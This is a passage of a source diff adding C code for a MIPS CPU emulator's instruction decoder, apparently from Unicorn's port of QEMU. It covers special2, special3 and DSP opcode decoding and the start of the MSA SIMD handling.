Treat as NOP. 
*/ + break; + +#if defined(TARGET_MIPS64) + /* MIPS64 specific opcodes */ + case OPC_DSLL: + case OPC_DSRA: + case OPC_DSLL32: + case OPC_DSRA32: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_shift_imm(ctx, op1, rd, rt, sa); + break; + case OPC_DSRL: + switch ((ctx->opcode >> 21) & 0x1f) { + case 1: + /* drotr is decoded as dsrl on non-R2 CPUs */ + if (ctx->insn_flags & ISA_MIPS32R2) { + op1 = OPC_DROTR; + } + /* Fallthrough */ + case 0: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_shift_imm(ctx, op1, rd, rt, sa); + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_DSRL32: + switch ((ctx->opcode >> 21) & 0x1f) { + case 1: + /* drotr32 is decoded as dsrl32 on non-R2 CPUs */ + if (ctx->insn_flags & ISA_MIPS32R2) { + op1 = OPC_DROTR32; + } + /* Fallthrough */ + case 0: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_shift_imm(ctx, op1, rd, rt, sa); + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_DADD: case OPC_DADDU: case OPC_DSUB: case OPC_DSUBU: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_arith(ctx, op1, rd, rs, rt); + break; + case OPC_DSLLV: + case OPC_DSRAV: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_shift(ctx, op1, rd, rs, rt); + break; + case OPC_DSRLV: + switch ((ctx->opcode >> 6) & 0x1f) { + case 1: + /* drotrv is decoded as dsrlv on non-R2 CPUs */ + if (ctx->insn_flags & ISA_MIPS32R2) { + op1 = OPC_DROTRV; + } + /* Fallthrough */ + case 0: + check_insn(ctx, ISA_MIPS3); + check_mips_64(ctx); + gen_shift(ctx, op1, rd, rs, rt); + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_DLSA: + if ((ctx->insn_flags & ISA_MIPS32R6) || + (env->CP0_Config3 & (1 << CP0C3_MSAP))) { + decode_opc_special_r6(env, ctx); + } + break; +#endif + default: + if (ctx->insn_flags & ISA_MIPS32R6) { + decode_opc_special_r6(env, ctx); + } else { + decode_opc_special_legacy(env, ctx); + } + } +} + +static void 
decode_opc_special2_legacy(CPUMIPSState *env, DisasContext *ctx) +{ + int rs, rt, rd; + uint32_t op1; + + check_insn_opc_removed(ctx, ISA_MIPS32R6); + + rs = (ctx->opcode >> 21) & 0x1f; + rt = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + + op1 = MASK_SPECIAL2(ctx->opcode); + switch (op1) { + case OPC_MADD: case OPC_MADDU: + case OPC_MSUB: case OPC_MSUBU: + check_insn(ctx, ISA_MIPS32); + gen_muldiv(ctx, op1, rd & 3, rs, rt); + break; + case OPC_MUL: + gen_arith(ctx, op1, rd, rs, rt); + break; + case OPC_DIV_G_2F: + case OPC_DIVU_G_2F: + case OPC_MULT_G_2F: + case OPC_MULTU_G_2F: + case OPC_MOD_G_2F: + case OPC_MODU_G_2F: + check_insn(ctx, INSN_LOONGSON2F); + gen_loongson_integer(ctx, op1, rd, rs, rt); + break; + case OPC_CLO: + case OPC_CLZ: + check_insn(ctx, ISA_MIPS32); + gen_cl(ctx, op1, rd, rs); + break; + case OPC_SDBBP: + /* XXX: not clear which exception should be raised + * when in debug mode... + */ + check_insn(ctx, ISA_MIPS32); + if (!(ctx->hflags & MIPS_HFLAG_DM)) { + generate_exception(ctx, EXCP_DBp); + } else { + generate_exception(ctx, EXCP_DBp); + } + /* Treat as NOP. 
*/ + break; +#if defined(TARGET_MIPS64) + case OPC_DCLO: + case OPC_DCLZ: + check_insn(ctx, ISA_MIPS64); + check_mips_64(ctx); + gen_cl(ctx, op1, rd, rs); + break; + case OPC_DMULT_G_2F: + case OPC_DMULTU_G_2F: + case OPC_DDIV_G_2F: + case OPC_DDIVU_G_2F: + case OPC_DMOD_G_2F: + case OPC_DMODU_G_2F: + check_insn(ctx, INSN_LOONGSON2F); + gen_loongson_integer(ctx, op1, rd, rs, rt); + break; +#endif + default: /* Invalid */ + MIPS_INVAL("special2_legacy"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +static void decode_opc_special3_r6(CPUMIPSState *env, DisasContext *ctx) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int rs, rt, rd, sa; + uint32_t op1, op2; + int16_t imm; + + rs = (ctx->opcode >> 21) & 0x1f; + rt = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + sa = (ctx->opcode >> 6) & 0x1f; + imm = (int16_t)ctx->opcode >> 7; + + op1 = MASK_SPECIAL3(ctx->opcode); + switch (op1) { + case R6_OPC_PREF: + if (rt >= 24) { + /* hint codes 24-31 are reserved and signal RI */ + generate_exception(ctx, EXCP_RI); + } + /* Treat as NOP. */ + break; + case R6_OPC_CACHE: + /* Treat as NOP. */ + break; + case R6_OPC_SC: + gen_st_cond(ctx, op1, rt, rs, imm); + break; + case R6_OPC_LL: + gen_ld(ctx, op1, rt, rs, imm); + break; + case OPC_BSHFL: + { + TCGv t0; + if (rd == 0) { + /* Treat as NOP. 
*/ + break; + } + t0 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rt); + + op2 = MASK_BSHFL(ctx->opcode); + switch (op2) { + case OPC_ALIGN: case OPC_ALIGN_END: + sa &= 3; + if (sa == 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], t0); + } else { + TCGv t1 = tcg_temp_new(tcg_ctx); + TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); + gen_load_gpr(ctx, t1, rs); + tcg_gen_concat_tl_i64(tcg_ctx, t2, t1, t0); + tcg_gen_shri_i64(tcg_ctx, t2, t2, 8 * (4 - sa)); +#if defined(TARGET_MIPS64) + tcg_gen_ext32s_i64(tcg_ctx, *cpu_gpr[rd], t2); +#else + tcg_gen_trunc_i64_i32(tcg_ctx, *cpu_gpr[rd], t2); +#endif + tcg_temp_free_i64(tcg_ctx, t2); + tcg_temp_free(tcg_ctx, t1); + } + break; + case OPC_BITSWAP: + gen_helper_bitswap(tcg_ctx, *cpu_gpr[rd], t0); + break; + } + tcg_temp_free(tcg_ctx, t0); + } + break; +#if defined(TARGET_MIPS64) + case R6_OPC_SCD: + gen_st_cond(ctx, op1, rt, rs, imm); + break; + case R6_OPC_LLD: + gen_ld(ctx, op1, rt, rs, imm); + break; + case OPC_DBSHFL: + check_mips_64(ctx); + { + TCGv t0; + if (rd == 0) { + /* Treat as NOP. 
*/ + break; + } + t0 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t0, rt); + + op2 = MASK_DBSHFL(ctx->opcode); + switch (op2) { + case OPC_DALIGN: case OPC_DALIGN_END: + sa &= 7; + if (sa == 0) { + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[rd], t0); + } else { + TCGv t1 = tcg_temp_new(tcg_ctx); + gen_load_gpr(ctx, t1, rs); + tcg_gen_shli_tl(tcg_ctx, t0, t0, 8 * sa); + tcg_gen_shri_tl(tcg_ctx, t1, t1, 8 * (8 - sa)); + tcg_gen_or_tl(tcg_ctx, *cpu_gpr[rd], t1, t0); + tcg_temp_free(tcg_ctx, t1); + } + break; + case OPC_DBITSWAP: + gen_helper_dbitswap(tcg_ctx, *cpu_gpr[rd], t0); + break; + } + tcg_temp_free(tcg_ctx, t0); + } + break; +#endif + default: /* Invalid */ + MIPS_INVAL("special3_r6"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +static void decode_opc_special3_legacy(CPUMIPSState *env, DisasContext *ctx) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int rs, rt, rd; + uint32_t op1, op2; + + rs = (ctx->opcode >> 21) & 0x1f; + rt = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + + op1 = MASK_SPECIAL3(ctx->opcode); + switch (op1) { + case OPC_DIV_G_2E: case OPC_DIVU_G_2E: + case OPC_MOD_G_2E: case OPC_MODU_G_2E: + case OPC_MULT_G_2E: case OPC_MULTU_G_2E: + /* OPC_MULT_G_2E, OPC_ADDUH_QB_DSP, OPC_MUL_PH_DSP have + * the same mask and op1. 
*/ + if ((ctx->insn_flags & ASE_DSPR2) && (op1 == OPC_MULT_G_2E)) { + op2 = MASK_ADDUH_QB(ctx->opcode); + switch (op2) { + case OPC_ADDUH_QB: + case OPC_ADDUH_R_QB: + case OPC_ADDQH_PH: + case OPC_ADDQH_R_PH: + case OPC_ADDQH_W: + case OPC_ADDQH_R_W: + case OPC_SUBUH_QB: + case OPC_SUBUH_R_QB: + case OPC_SUBQH_PH: + case OPC_SUBQH_R_PH: + case OPC_SUBQH_W: + case OPC_SUBQH_R_W: + gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); + break; + case OPC_MUL_PH: + case OPC_MUL_S_PH: + case OPC_MULQ_S_W: + case OPC_MULQ_RS_W: + gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 1); + break; + default: + MIPS_INVAL("MASK ADDUH.QB"); + generate_exception(ctx, EXCP_RI); + break; + } + } else if (ctx->insn_flags & INSN_LOONGSON2E) { + gen_loongson_integer(ctx, op1, rd, rs, rt); + } else { + generate_exception(ctx, EXCP_RI); + } + break; + case OPC_LX_DSP: + op2 = MASK_LX(ctx->opcode); + switch (op2) { +#if defined(TARGET_MIPS64) + case OPC_LDX: +#endif + case OPC_LBUX: + case OPC_LHX: + case OPC_LWX: + gen_mipsdsp_ld(ctx, op2, rd, rs, rt); + break; + default: /* Invalid */ + MIPS_INVAL("MASK LX"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_ABSQ_S_PH_DSP: + op2 = MASK_ABSQ_S_PH(ctx->opcode); + switch (op2) { + case OPC_ABSQ_S_QB: + case OPC_ABSQ_S_PH: + case OPC_ABSQ_S_W: + case OPC_PRECEQ_W_PHL: + case OPC_PRECEQ_W_PHR: + case OPC_PRECEQU_PH_QBL: + case OPC_PRECEQU_PH_QBR: + case OPC_PRECEQU_PH_QBLA: + case OPC_PRECEQU_PH_QBRA: + case OPC_PRECEU_PH_QBL: + case OPC_PRECEU_PH_QBR: + case OPC_PRECEU_PH_QBLA: + case OPC_PRECEU_PH_QBRA: + gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); + break; + case OPC_BITREV: + case OPC_REPL_QB: + case OPC_REPLV_QB: + case OPC_REPL_PH: + case OPC_REPLV_PH: + gen_mipsdsp_bitinsn(ctx, op1, op2, rd, rt); + break; + default: + MIPS_INVAL("MASK ABSQ_S.PH"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_ADDU_QB_DSP: + op2 = MASK_ADDU_QB(ctx->opcode); + switch (op2) { + case OPC_ADDQ_PH: + case OPC_ADDQ_S_PH: + 
case OPC_ADDQ_S_W: + case OPC_ADDU_QB: + case OPC_ADDU_S_QB: + case OPC_ADDU_PH: + case OPC_ADDU_S_PH: + case OPC_SUBQ_PH: + case OPC_SUBQ_S_PH: + case OPC_SUBQ_S_W: + case OPC_SUBU_QB: + case OPC_SUBU_S_QB: + case OPC_SUBU_PH: + case OPC_SUBU_S_PH: + case OPC_ADDSC: + case OPC_ADDWC: + case OPC_MODSUB: + case OPC_RADDU_W_QB: + gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); + break; + case OPC_MULEU_S_PH_QBL: + case OPC_MULEU_S_PH_QBR: + case OPC_MULQ_RS_PH: + case OPC_MULEQ_S_W_PHL: + case OPC_MULEQ_S_W_PHR: + case OPC_MULQ_S_PH: + gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 1); + break; + default: /* Invalid */ + MIPS_INVAL("MASK ADDU.QB"); + generate_exception(ctx, EXCP_RI); + break; + + } + break; + case OPC_CMPU_EQ_QB_DSP: + op2 = MASK_CMPU_EQ_QB(ctx->opcode); + switch (op2) { + case OPC_PRECR_SRA_PH_W: + case OPC_PRECR_SRA_R_PH_W: + gen_mipsdsp_arith(ctx, op1, op2, rt, rs, rd); + break; + case OPC_PRECR_QB_PH: + case OPC_PRECRQ_QB_PH: + case OPC_PRECRQ_PH_W: + case OPC_PRECRQ_RS_PH_W: + case OPC_PRECRQU_S_QB_PH: + gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); + break; + case OPC_CMPU_EQ_QB: + case OPC_CMPU_LT_QB: + case OPC_CMPU_LE_QB: + case OPC_CMP_EQ_PH: + case OPC_CMP_LT_PH: + case OPC_CMP_LE_PH: + gen_mipsdsp_add_cmp_pick(ctx, op1, op2, rd, rs, rt, 0); + break; + case OPC_CMPGU_EQ_QB: + case OPC_CMPGU_LT_QB: + case OPC_CMPGU_LE_QB: + case OPC_CMPGDU_EQ_QB: + case OPC_CMPGDU_LT_QB: + case OPC_CMPGDU_LE_QB: + case OPC_PICK_QB: + case OPC_PICK_PH: + case OPC_PACKRL_PH: + gen_mipsdsp_add_cmp_pick(ctx, op1, op2, rd, rs, rt, 1); + break; + default: /* Invalid */ + MIPS_INVAL("MASK CMPU.EQ.QB"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_SHLL_QB_DSP: + gen_mipsdsp_shift(ctx, op1, rd, rs, rt); + break; + case OPC_DPA_W_PH_DSP: + op2 = MASK_DPA_W_PH(ctx->opcode); + switch (op2) { + case OPC_DPAU_H_QBL: + case OPC_DPAU_H_QBR: + case OPC_DPSU_H_QBL: + case OPC_DPSU_H_QBR: + case OPC_DPA_W_PH: + case OPC_DPAX_W_PH: + case 
OPC_DPAQ_S_W_PH: + case OPC_DPAQX_S_W_PH: + case OPC_DPAQX_SA_W_PH: + case OPC_DPS_W_PH: + case OPC_DPSX_W_PH: + case OPC_DPSQ_S_W_PH: + case OPC_DPSQX_S_W_PH: + case OPC_DPSQX_SA_W_PH: + case OPC_MULSAQ_S_W_PH: + case OPC_DPAQ_SA_L_W: + case OPC_DPSQ_SA_L_W: + case OPC_MAQ_S_W_PHL: + case OPC_MAQ_S_W_PHR: + case OPC_MAQ_SA_W_PHL: + case OPC_MAQ_SA_W_PHR: + case OPC_MULSA_W_PH: + gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 0); + break; + default: /* Invalid */ + MIPS_INVAL("MASK DPAW.PH"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_INSV_DSP: + op2 = MASK_INSV(ctx->opcode); + switch (op2) { + case OPC_INSV: + check_dsp(ctx); + { + TCGv t0, t1; + + if (rt == 0) { + MIPS_DEBUG("NOP"); + break; + } + + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rt); + gen_load_gpr(ctx, t1, rs); + + gen_helper_insv(tcg_ctx, *cpu_gpr[rt], tcg_ctx->cpu_env, t1, t0); + + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + break; + } + default: /* Invalid */ + MIPS_INVAL("MASK INSV"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_APPEND_DSP: + gen_mipsdsp_append(env, ctx, op1, rt, rs, rd); + break; + case OPC_EXTR_W_DSP: + op2 = MASK_EXTR_W(ctx->opcode); + switch (op2) { + case OPC_EXTR_W: + case OPC_EXTR_R_W: + case OPC_EXTR_RS_W: + case OPC_EXTR_S_H: + case OPC_EXTRV_S_H: + case OPC_EXTRV_W: + case OPC_EXTRV_R_W: + case OPC_EXTRV_RS_W: + case OPC_EXTP: + case OPC_EXTPV: + case OPC_EXTPDP: + case OPC_EXTPDPV: + gen_mipsdsp_accinsn(ctx, op1, op2, rt, rs, rd, 1); + break; + case OPC_RDDSP: + gen_mipsdsp_accinsn(ctx, op1, op2, rd, rs, rt, 1); + break; + case OPC_SHILO: + case OPC_SHILOV: + case OPC_MTHLIP: + case OPC_WRDSP: + gen_mipsdsp_accinsn(ctx, op1, op2, rd, rs, rt, 0); + break; + default: /* Invalid */ + MIPS_INVAL("MASK EXTR.W"); + generate_exception(ctx, EXCP_RI); + break; + } + break; +#if defined(TARGET_MIPS64) + case OPC_DDIV_G_2E: case OPC_DDIVU_G_2E: + case OPC_DMULT_G_2E: case 
OPC_DMULTU_G_2E: + case OPC_DMOD_G_2E: case OPC_DMODU_G_2E: + check_insn(ctx, INSN_LOONGSON2E); + gen_loongson_integer(ctx, op1, rd, rs, rt); + break; + case OPC_ABSQ_S_QH_DSP: + op2 = MASK_ABSQ_S_QH(ctx->opcode); + switch (op2) { + case OPC_PRECEQ_L_PWL: + case OPC_PRECEQ_L_PWR: + case OPC_PRECEQ_PW_QHL: + case OPC_PRECEQ_PW_QHR: + case OPC_PRECEQ_PW_QHLA: + case OPC_PRECEQ_PW_QHRA: + case OPC_PRECEQU_QH_OBL: + case OPC_PRECEQU_QH_OBR: + case OPC_PRECEQU_QH_OBLA: + case OPC_PRECEQU_QH_OBRA: + case OPC_PRECEU_QH_OBL: + case OPC_PRECEU_QH_OBR: + case OPC_PRECEU_QH_OBLA: + case OPC_PRECEU_QH_OBRA: + case OPC_ABSQ_S_OB: + case OPC_ABSQ_S_PW: + case OPC_ABSQ_S_QH: + gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); + break; + case OPC_REPL_OB: + case OPC_REPL_PW: + case OPC_REPL_QH: + case OPC_REPLV_OB: + case OPC_REPLV_PW: + case OPC_REPLV_QH: + gen_mipsdsp_bitinsn(ctx, op1, op2, rd, rt); + break; + default: /* Invalid */ + MIPS_INVAL("MASK ABSQ_S.QH"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_ADDU_OB_DSP: + op2 = MASK_ADDU_OB(ctx->opcode); + switch (op2) { + case OPC_RADDU_L_OB: + case OPC_SUBQ_PW: + case OPC_SUBQ_S_PW: + case OPC_SUBQ_QH: + case OPC_SUBQ_S_QH: + case OPC_SUBU_OB: + case OPC_SUBU_S_OB: + case OPC_SUBU_QH: + case OPC_SUBU_S_QH: + case OPC_SUBUH_OB: + case OPC_SUBUH_R_OB: + case OPC_ADDQ_PW: + case OPC_ADDQ_S_PW: + case OPC_ADDQ_QH: + case OPC_ADDQ_S_QH: + case OPC_ADDU_OB: + case OPC_ADDU_S_OB: + case OPC_ADDU_QH: + case OPC_ADDU_S_QH: + case OPC_ADDUH_OB: + case OPC_ADDUH_R_OB: + gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); + break; + case OPC_MULEQ_S_PW_QHL: + case OPC_MULEQ_S_PW_QHR: + case OPC_MULEU_S_QH_OBL: + case OPC_MULEU_S_QH_OBR: + case OPC_MULQ_RS_QH: + gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 1); + break; + default: /* Invalid */ + MIPS_INVAL("MASK ADDU.OB"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_CMPU_EQ_OB_DSP: + op2 = MASK_CMPU_EQ_OB(ctx->opcode); + switch (op2) { + case 
OPC_PRECR_SRA_QH_PW: + case OPC_PRECR_SRA_R_QH_PW: + /* Return value is rt. */ + gen_mipsdsp_arith(ctx, op1, op2, rt, rs, rd); + break; + case OPC_PRECR_OB_QH: + case OPC_PRECRQ_OB_QH: + case OPC_PRECRQ_PW_L: + case OPC_PRECRQ_QH_PW: + case OPC_PRECRQ_RS_QH_PW: + case OPC_PRECRQU_S_OB_QH: + gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); + break; + case OPC_CMPU_EQ_OB: + case OPC_CMPU_LT_OB: + case OPC_CMPU_LE_OB: + case OPC_CMP_EQ_QH: + case OPC_CMP_LT_QH: + case OPC_CMP_LE_QH: + case OPC_CMP_EQ_PW: + case OPC_CMP_LT_PW: + case OPC_CMP_LE_PW: + gen_mipsdsp_add_cmp_pick(ctx, op1, op2, rd, rs, rt, 0); + break; + case OPC_CMPGDU_EQ_OB: + case OPC_CMPGDU_LT_OB: + case OPC_CMPGDU_LE_OB: + case OPC_CMPGU_EQ_OB: + case OPC_CMPGU_LT_OB: + case OPC_CMPGU_LE_OB: + case OPC_PACKRL_PW: + case OPC_PICK_OB: + case OPC_PICK_PW: + case OPC_PICK_QH: + gen_mipsdsp_add_cmp_pick(ctx, op1, op2, rd, rs, rt, 1); + break; + default: /* Invalid */ + MIPS_INVAL("MASK CMPU_EQ.OB"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_DAPPEND_DSP: + gen_mipsdsp_append(env, ctx, op1, rt, rs, rd); + break; + case OPC_DEXTR_W_DSP: + op2 = MASK_DEXTR_W(ctx->opcode); + switch (op2) { + case OPC_DEXTP: + case OPC_DEXTPDP: + case OPC_DEXTPDPV: + case OPC_DEXTPV: + case OPC_DEXTR_L: + case OPC_DEXTR_R_L: + case OPC_DEXTR_RS_L: + case OPC_DEXTR_W: + case OPC_DEXTR_R_W: + case OPC_DEXTR_RS_W: + case OPC_DEXTR_S_H: + case OPC_DEXTRV_L: + case OPC_DEXTRV_R_L: + case OPC_DEXTRV_RS_L: + case OPC_DEXTRV_S_H: + case OPC_DEXTRV_W: + case OPC_DEXTRV_R_W: + case OPC_DEXTRV_RS_W: + gen_mipsdsp_accinsn(ctx, op1, op2, rt, rs, rd, 1); + break; + case OPC_DMTHLIP: + case OPC_DSHILO: + case OPC_DSHILOV: + gen_mipsdsp_accinsn(ctx, op1, op2, rd, rs, rt, 0); + break; + default: /* Invalid */ + MIPS_INVAL("MASK EXTR.W"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_DPAQ_W_QH_DSP: + op2 = MASK_DPAQ_W_QH(ctx->opcode); + switch (op2) { + case OPC_DPAU_H_OBL: + case OPC_DPAU_H_OBR: + 
case OPC_DPSU_H_OBL: + case OPC_DPSU_H_OBR: + case OPC_DPA_W_QH: + case OPC_DPAQ_S_W_QH: + case OPC_DPS_W_QH: + case OPC_DPSQ_S_W_QH: + case OPC_MULSAQ_S_W_QH: + case OPC_DPAQ_SA_L_PW: + case OPC_DPSQ_SA_L_PW: + case OPC_MULSAQ_S_L_PW: + gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 0); + break; + case OPC_MAQ_S_W_QHLL: + case OPC_MAQ_S_W_QHLR: + case OPC_MAQ_S_W_QHRL: + case OPC_MAQ_S_W_QHRR: + case OPC_MAQ_SA_W_QHLL: + case OPC_MAQ_SA_W_QHLR: + case OPC_MAQ_SA_W_QHRL: + case OPC_MAQ_SA_W_QHRR: + case OPC_MAQ_S_L_PWL: + case OPC_MAQ_S_L_PWR: + case OPC_DMADD: + case OPC_DMADDU: + case OPC_DMSUB: + case OPC_DMSUBU: + gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 0); + break; + default: /* Invalid */ + MIPS_INVAL("MASK DPAQ.W.QH"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_DINSV_DSP: + op2 = MASK_INSV(ctx->opcode); + switch (op2) { + case OPC_DINSV: + { + TCGv t0, t1; + + if (rt == 0) { + MIPS_DEBUG("NOP"); + break; + } + check_dsp(ctx); + + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rt); + gen_load_gpr(ctx, t1, rs); + + gen_helper_dinsv(tcg_ctx, *cpu_gpr[rt], tcg_ctx->cpu_env, t1, t0); + + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + break; + } + default: /* Invalid */ + MIPS_INVAL("MASK DINSV"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_SHLL_OB_DSP: + gen_mipsdsp_shift(ctx, op1, rd, rs, rt); + break; +#endif + default: /* Invalid */ + MIPS_INVAL("special3_legacy"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +static void decode_opc_special3(CPUMIPSState *env, DisasContext *ctx) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + int rs, rt, rd, sa; + uint32_t op1, op2; + + rs = (ctx->opcode >> 21) & 0x1f; + rt = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + sa = (ctx->opcode >> 6) & 0x1f; + + op1 = MASK_SPECIAL3(ctx->opcode); + switch (op1) { + case OPC_EXT: + case OPC_INS: + check_insn(ctx, ISA_MIPS32R2); + gen_bitops(ctx, op1, 
rt, rs, sa, rd); + break; + case OPC_BSHFL: + op2 = MASK_BSHFL(ctx->opcode); + switch (op2) { + case OPC_ALIGN: case OPC_ALIGN_END: + case OPC_BITSWAP: + check_insn(ctx, ISA_MIPS32R6); + decode_opc_special3_r6(env, ctx); + break; + default: + check_insn(ctx, ISA_MIPS32R2); + gen_bshfl(ctx, op2, rt, rd); + break; + } + break; +#if defined(TARGET_MIPS64) + case OPC_DEXTM: case OPC_DEXTU: case OPC_DEXT: + case OPC_DINSM: case OPC_DINSU: case OPC_DINS: + check_insn(ctx, ISA_MIPS64R2); + check_mips_64(ctx); + gen_bitops(ctx, op1, rt, rs, sa, rd); + break; + case OPC_DBSHFL: + op2 = MASK_DBSHFL(ctx->opcode); + switch (op2) { + case OPC_DALIGN: case OPC_DALIGN_END: + case OPC_DBITSWAP: + check_insn(ctx, ISA_MIPS32R6); + decode_opc_special3_r6(env, ctx); + break; + default: + check_insn(ctx, ISA_MIPS64R2); + check_mips_64(ctx); + op2 = MASK_DBSHFL(ctx->opcode); + gen_bshfl(ctx, op2, rt, rd); + break; + } + break; +#endif + case OPC_RDHWR: + gen_rdhwr(ctx, rt, rd); + break; + case OPC_FORK: + check_insn(ctx, ASE_MT); + { + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rt); + gen_load_gpr(ctx, t1, rs); + gen_helper_fork(tcg_ctx, t0, t1); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + } + break; + case OPC_YIELD: + check_insn(ctx, ASE_MT); + { + TCGv t0 = tcg_temp_new(tcg_ctx); + + save_cpu_state(ctx, 1); + gen_load_gpr(ctx, t0, rs); + gen_helper_yield(tcg_ctx, t0, tcg_ctx->cpu_env, t0); + gen_store_gpr(tcg_ctx, t0, rd); + tcg_temp_free(tcg_ctx, t0); + } + break; + default: + if (ctx->insn_flags & ISA_MIPS32R6) { + decode_opc_special3_r6(env, ctx); + } else { + decode_opc_special3_legacy(env, ctx); + } + } +} + +/* MIPS SIMD Architecture (MSA) */ +static inline int check_msa_access(DisasContext *ctx) +{ + if (unlikely((ctx->hflags & MIPS_HFLAG_FPU) && + !(ctx->hflags & MIPS_HFLAG_F64))) { + generate_exception(ctx, EXCP_RI); + return 0; + } + + if (unlikely(!(ctx->hflags & MIPS_HFLAG_MSA))) { + if (ctx->insn_flags 
& ASE_MSA) { + generate_exception(ctx, EXCP_MSADIS); + return 0; + } else { + generate_exception(ctx, EXCP_RI); + return 0; + } + } + return 1; +} + +static void gen_check_zero_element(CPUMIPSState *env, TCGv tresult, uint8_t df, uint8_t wt) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + /* generates tcg ops to check if any element is 0 */ + /* Note this function only works with MSA_WRLEN = 128 */ + uint64_t eval_zero_or_big = 0; + uint64_t eval_big = 0; + TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); + switch (df) { + case DF_BYTE: + eval_zero_or_big = 0x0101010101010101ULL; + eval_big = 0x8080808080808080ULL; + break; + case DF_HALF: + eval_zero_or_big = 0x0001000100010001ULL; + eval_big = 0x8000800080008000ULL; + break; + case DF_WORD: + eval_zero_or_big = 0x0000000100000001ULL; + eval_big = 0x8000000080000000ULL; + break; + case DF_DOUBLE: + eval_zero_or_big = 0x0000000000000001ULL; + eval_big = 0x8000000000000000ULL; + break; + } + tcg_gen_subi_i64(tcg_ctx, t0, tcg_ctx->msa_wr_d[wt<<1], eval_zero_or_big); + tcg_gen_andc_i64(tcg_ctx, t0, t0, tcg_ctx->msa_wr_d[wt<<1]); + tcg_gen_andi_i64(tcg_ctx, t0, t0, eval_big); + tcg_gen_subi_i64(tcg_ctx, t1, tcg_ctx->msa_wr_d[(wt<<1)+1], eval_zero_or_big); + tcg_gen_andc_i64(tcg_ctx, t1, t1, tcg_ctx->msa_wr_d[(wt<<1)+1]); + tcg_gen_andi_i64(tcg_ctx, t1, t1, eval_big); + tcg_gen_or_i64(tcg_ctx, t0, t0, t1); + /* if all bits are zero then all elements are not zero */ + /* if some bit is non-zero then some element is zero */ + tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_NE, t0, t0, 0); + tcg_gen_trunc_i64_tl(tcg_ctx, tresult, t0); + tcg_temp_free_i64(tcg_ctx, t0); + tcg_temp_free_i64(tcg_ctx, t1); +} + +static void gen_msa_branch(CPUMIPSState *env, DisasContext *ctx, uint32_t op1) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + uint8_t df = (ctx->opcode >> 21) & 0x3; + uint8_t wt = (ctx->opcode >> 16) & 0x1f; + int64_t s16 = (int16_t)ctx->opcode; + + check_msa_access(ctx); + + if 
